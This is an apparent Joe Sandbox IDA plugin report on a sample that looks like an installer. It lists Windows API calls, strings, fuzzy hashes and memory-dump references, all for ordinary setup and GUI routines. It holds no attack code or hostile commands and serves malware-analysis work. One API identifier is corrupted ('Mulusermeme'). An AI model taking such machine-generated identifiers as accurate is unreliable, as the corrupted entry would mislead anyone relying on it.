                                                                                                      • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                                      • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                      • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                                      • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                                      • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                      • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                                      • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                      • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                                      • GetDC.USER32(00000000), ref: 0041BC12
                                                                                                      • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                                      • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                                      • String ID:
                                                                                                      • API String ID: 1095203571-0
                                                                                                      • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                      • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                                      • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                      • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                                      APIs
                                                                                                        • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                                      Strings
                                                                                                      • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                                      • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                                      • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                      • API String ID: 1452528299-4018462623
                                                                                                      • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                      • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                                      • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                      • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                                      • String ID:
                                                                                                      • API String ID: 262959230-0
                                                                                                      • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                      • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                      • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                      • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                      APIs
                                                                                                      • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                                      • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                                      • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                                      • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Palette$RealizeSelect$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 2261976640-0
                                                                                                      • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                      • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                                      • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                      • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                                        • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                                        • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                                        • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                                      • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                                      • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                                      • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                                        • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                                        • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                                        • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                                        • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                                      • String ID: vLB
                                                                                                      • API String ID: 1477829881-1797516613
                                                                                                      • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                      • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                                      • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                      • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                                      APIs
                                                                                                      • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                                      • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                                      • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Enum$NameOpenResourceUniversal
                                                                                                      • String ID: Z
                                                                                                      • API String ID: 3604996873-1505515367
                                                                                                      • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                      • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                                      • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                      • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                                      APIs
                                                                                                      • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DrawText$EmptyRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 182455014-2867612384
                                                                                                      • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                      • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                                      • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                      • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                                        • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                                      • String ID: ...\
                                                                                                      • API String ID: 3133960002-983595016
                                                                                                      • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                      • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                                      • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                      • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                                      APIs
                                                                                                      • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                      • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                      • RegisterClassA.USER32(?), ref: 004164CE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Class$InfoRegisterUnregister
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3749476976-2766056989
                                                                                                      • Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                                      • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                                      • Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                                      • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                                      • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Attributes$Move
                                                                                                      • String ID: isRS-%.3u.tmp
                                                                                                      • API String ID: 3839737484-3657609586
                                                                                                      • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                                      • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                                      • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                                      • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                      • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitMessageProcess
                                                                                                      • String ID: Error$Runtime error at 00000000
                                                                                                      • API String ID: 1220098344-2970929446
                                                                                                      • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                      • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                                      • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                      • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                                      • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Type$AllocByteCharFullLoadMulusermePathRegisterStringWide
                                                                                                      • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                      • API String ID: 1312246647-2435364021
                                                                                                      • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                      • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                                      • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                      • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                                      • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                                      Strings
                                                                                                      • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                                      • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                      • API String ID: 3850602802-3720027226
                                                                                                      • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                      • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                                      • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                      • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                                      APIs
                                                                                                        • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                      • GetFocus.USER32 ref: 00478757
                                                                                                      • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                                      • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
